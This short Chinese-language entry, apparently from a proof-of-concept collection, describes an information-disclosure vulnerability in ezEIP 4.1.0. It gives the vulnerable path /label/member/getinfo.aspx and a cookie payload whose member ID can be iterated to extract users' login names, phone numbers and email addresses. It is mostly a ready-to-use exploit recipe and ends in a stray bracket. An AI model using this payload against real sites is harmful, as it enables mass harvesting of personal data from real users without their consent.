ezEIP 4.1.0 存在信息泄露漏洞,通过遍历Cookie中的参数值获取敏感信息
ezEIP 4.1.0
"ezEIP"
漏洞Url为
/label/member/getinfo.aspx
访问时添加Cookie(通过遍历获取用户的登录名电话邮箱等信息)
WHIR_USERINFOR=whir_mem_member_pid=1;
[